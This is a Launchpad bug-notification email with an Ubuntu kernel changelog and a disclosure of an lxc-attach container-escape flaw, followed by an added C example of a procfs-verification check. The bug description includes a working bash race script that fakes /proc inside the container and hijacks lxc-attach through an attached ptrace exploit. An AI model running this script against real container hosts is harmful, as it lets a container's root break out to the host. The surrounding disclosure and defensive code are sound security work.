This bug was fixed in the package linux - 3.19.0-75.83

---------------
linux (3.19.0-75.83) vivid; urgency=low
  [ Luis Henriques ]

  * Release Tracking Bug
    - LP: #1640613

  * lxc-attach to malicious container allows access to host (LP: #1639345)
    - Revert "UBUNTU: ptrace: being capable wrt a process requires mapped uids/gids"
    - (upstream) mm: Add a user_ns owner to mm_struct and fix ptrace permission checks

  * CVE-2016-8658
    - brcmfmac: avoid potential stack overflow in brcmf_cfg80211_start_ap()

  * CVE-2016-7425
    - scsi: arcmsr: Buffer overflow in arcmsr_iop_message_xfer()

 -- Luis Henriques <luis.henriq...@canonical.com>  Wed, 09 Nov 2016 22:48:56 +0000

** Changed in: linux (Ubuntu Vivid)
       Status: Fix Committed => Fix Released

** Changed in: linux (Ubuntu Xenial)
       Status: Fix Committed => Fix Released

-- 
You received this bug notification because you are a member of Kernel
Packages, which is subscribed to linux in Ubuntu.
https://bugs.launchpad.net/bugs/1639345

Title:
  lxc-attach to malicious container allows access to host

Status in linux package in Ubuntu:
  Triaged
Status in lxc package in Ubuntu:
  Fix Released
Status in linux source package in Trusty:
  Fix Released
Status in lxc source package in Trusty:
  Fix Released
Status in linux source package in Vivid:
  Fix Released
Status in lxc source package in Vivid:
  Fix Released
Status in linux source package in Xenial:
  Fix Released
Status in lxc source package in Xenial:
  Fix Released
Status in linux source package in Yakkety:
  Fix Released
Status in lxc source package in Yakkety:
  Fix Released

Bug description:
  A malicious root user in an unprivileged container may interfere with
  lxc-attach to provide manipulated guest proc file system information to
  disable dropping of capabilities and may in the end access the host file
  system by winning a very easy race against lxc-attach.
  In guest sequence:

    cat <<EOF > /tmp/test
    #!/bin/bash -e
    rm -rf /test || true
    mkdir -p /test/sys/kernel
    echo "proc /proc proc rw,nosuid,nodev,noexec,relatime 0 0" > /test/mounts
    echo 0 > /test/sys/kernel/cap_last_cap
    mkdir -p /test/self
    mknod /test/self/status p
    cd /proc
    mount -o bind /test /proc
    while true; do
      pid=\$(ls -al */exe | grep lxc-attach | sed -r -e 's/.* ([0-9]+)\\/exe ->.*/\\1/')
      if [ "\${pid}" != "" ]; then
        cd /
        umount -i -f -l -n /proc
        exec /LxcAttachEscape "\${pid}" /bin/bash
      fi
      sleep 1
    done
    EOF

  See attachment for LxcAttachEscape.c

  The exploit uses a fixed fd=7 for attacking; in other test environments
  it might be a different fd.

  Tests were performed by attacking lxc-attach started by

    screen lxc-attach -n [guestname]

  which is the sequence required against the TTY-stealing attacks also not
  fixed in all lxc-attach versions.

  In my opinion two bugs might need fixing:
  * lxc-attach should not use untrusted/manipulated information for proceeding
  * kernel should prevent ptracing of lxc-attach as it was created in another USERNS

  # lsb_release -r -d
  Description:    Ubuntu 16.04.1 LTS
  Release:        16.04

  # apt-cache policy lxc1
  lxc1:
    Installed: 2.0.5-0ubuntu1~ubuntu16.04.2
    Candidate: 2.0.5-0ubuntu1~ubuntu16.04.2
    Version table:
   *** 2.0.5-0ubuntu1~ubuntu16.04.2 500
          500 http://debarchive-ehealth.d03.arc.local/ubuntu xenial-updates/main amd64 Packages
          100 /var/lib/dpkg/status
       2.0.0-0ubuntu2 500
          500 http://debarchive-ehealth.d03.arc.local/ubuntu xenial/main amd64 Packages

To manage notifications about this bug go to:
https://bugs.launchpad.net/ubuntu/+source/linux/+bug/1639345/+subscriptions

-- 
Mailing list: https://launchpad.net/~kernel-packages
Post to     : kernel-packages@lists.launchpad.net
Unsubscribe : https://launchpad.net/~kernel-packages
More help   : https://help.launchpad.net/ListHelp
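The reporter's first point is that lxc-attach trusted files under the guest's /proc (cap_last_cap, self/status) even though container root can bind-mount an ordinary directory over /proc and fill it with whatever values it likes. The example below is added here as an illustration of the defensive check and is neither lxc's own code nor the reporter's: before reading a value from a proc tree, confirm with statfs(2) that the path really sits on procfs (PROC_SUPER_MAGIC, 0x9fa0), and treat an implausible cap_last_cap of 0 as an error rather than as "drop nothing". The function names (is_procfs, read_cap_last_cap_checked, make_fake_proc) are mine, the fake tree is a constructed sample that mirrors the one in the report, and the code assumes Linux with glibc. The check defeats the plain-directory substitution described above; it does not replace the kernel-side fix for cross-user-namespace ptrace that the changelog records.

```c
// Added example, not lxc's code: refuse to trust proc values unless the
// tree they come from is genuinely procfs.
#define _GNU_SOURCE
#include <limits.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/stat.h>
#include <sys/vfs.h>
#include <unistd.h>

#ifndef PROC_SUPER_MAGIC
#define PROC_SUPER_MAGIC 0x9fa0  /* value from linux/magic.h */
#endif

/* 1 if `path` is on a procfs mount, 0 if it is on anything else, -1 on error. */
int is_procfs(const char *path) {
    struct statfs sfs;
    if (statfs(path, &sfs) != 0) return -1;
    return sfs.f_type == PROC_SUPER_MAGIC ? 1 : 0;
}

/* Read <proc_root>/sys/kernel/cap_last_cap, but only if both the root and
 * the file itself are on procfs. Returns the value, or -1 if the check or
 * the parse fails. A value of 0 is rejected: a caller that used it to size
 * its capability-dropping loop would drop nothing. */
long read_cap_last_cap_checked(const char *proc_root) {
    char path[PATH_MAX];
    snprintf(path, sizeof path, "%s/sys/kernel/cap_last_cap", proc_root);
    if (is_procfs(proc_root) != 1 || is_procfs(path) != 1) return -1;
    FILE *f = fopen(path, "r");
    if (!f) return -1;
    long v = -1;
    if (fscanf(f, "%ld", &v) != 1) v = -1;
    fclose(f);
    return v > 0 ? v : -1;
}

/* Constructed sample input: a plain directory shaped like the fake /proc in
 * the bug report, with cap_last_cap set to 0. Writes the path into `out`. */
int make_fake_proc(char *out, size_t outlen) {
    char tmpl[] = "/tmp/fakeproc-XXXXXX";
    if (!mkdtemp(tmpl)) return -1;
    char p[PATH_MAX];
    snprintf(p, sizeof p, "%s/sys", tmpl);
    if (mkdir(p, 0700) != 0) return -1;
    snprintf(p, sizeof p, "%s/sys/kernel", tmpl);
    if (mkdir(p, 0700) != 0) return -1;
    snprintf(p, sizeof p, "%s/sys/kernel/cap_last_cap", tmpl);
    FILE *f = fopen(p, "w");
    if (!f) return -1;
    fputs("0\n", f);
    fclose(f);
    snprintf(out, outlen, "%s", tmpl);
    return 0;
}

int main(void) {
    char fake[PATH_MAX];
    if (make_fake_proc(fake, sizeof fake) == 0)
        printf("fake tree %s -> %ld (rejected: not procfs)\n",
               fake, read_cap_last_cap_checked(fake));
    printf("/proc -> %ld\n", read_cap_last_cap_checked("/proc"));
    return 0;
}
```

The same statfs check applies to any other file the attaching process reads from the target's proc tree, such as the status file the report replaces with a FIFO; the cap_last_cap case is shown because it is the one the report's script manipulates.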